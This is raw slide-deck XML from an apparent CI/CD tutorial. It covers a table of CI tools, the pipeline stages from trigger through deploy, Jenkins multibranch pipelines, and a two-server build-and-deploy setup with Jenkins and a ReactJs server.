                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Free</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="320650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="138000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1500"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="800"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CircleCI</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="320650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="138000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1500"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="800"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>TeamCity</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="320650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="138000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1500"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="800"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Atlassian Bamboo</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Paid</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="320650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="138000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1500"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="800"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Travis CI</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="320650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="320650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="320650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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343"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375725" y="2001425"/>
            <a:ext cx="8520600" cy="20748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990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4150">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Figure out how many stages you need in your pipeline ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="6320">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2101" name="Google Shape;2101;p343"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631725" y="559175"/>
            <a:ext cx="7768500" cy="1248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rPr>
              <a:t>CI / CD Pipeline</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="600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6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="43284"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="782959" y="0"/>
            <a:ext cx="7578079" cy="5143500"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2106" name="Google Shape;2106;p344"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2481225" y="1114175"/>
            <a:ext cx="4590600" cy="3820200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-447675" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3450"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3450">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Trigger</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3450">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-447675" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3450"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3450">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Checkout Code</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3450">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-447675" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3450"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3450">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Build</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3450">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-447675" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3450"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3450">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Test</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3450">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-447675" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3450"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3450">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Deploy</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3450">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2107" name="Google Shape;2107;p344"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="998925" y="382300"/>
            <a:ext cx="7555200" cy="91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600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CI / CD Stages</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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345"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="998925" y="158200"/>
            <a:ext cx="7555200" cy="71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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jenkins MultiBranch Pipeline</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3400">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2113" name="Google Shape;2113;p345"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2853" l="9729" r="11231" t="3888"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2703332" y="868600"/>
            <a:ext cx="4146381" cy="4157475"/>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7" name="Shape 2117"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2118" name="Google Shape;2118;p346"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="998925" y="62175"/>
            <a:ext cx="7555200" cy="71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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jenkins MultiBranch CI/CD Pipeline</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3400">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2119" name="Google Shape;2119;p346"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7806" l="0" r="0" t="7526"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1461988" y="772575"/>
            <a:ext cx="6629074" cy="4209550"/>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3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25" name="Google Shape;2125;p3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https://e.printstacktrace.blog/jenkins-pipeline-environment-variables-the-definitive-guide/</a:t>
            </a:r>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2130" name="Google Shape;2130;p348"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2860950" y="152400"/>
            <a:ext cx="3970971" cy="4838702"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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349"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654850" y="438425"/>
            <a:ext cx="8052600" cy="44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solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server1 -&gt; AWS EC2        (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deploy Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server2 -&gt; Digital Ocean Droplet (Jenkins)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We need 2 servers</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Build Server (144.91.98.33) (Jenkins)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deploy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Server (38.242.236.173)(ReactJs)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
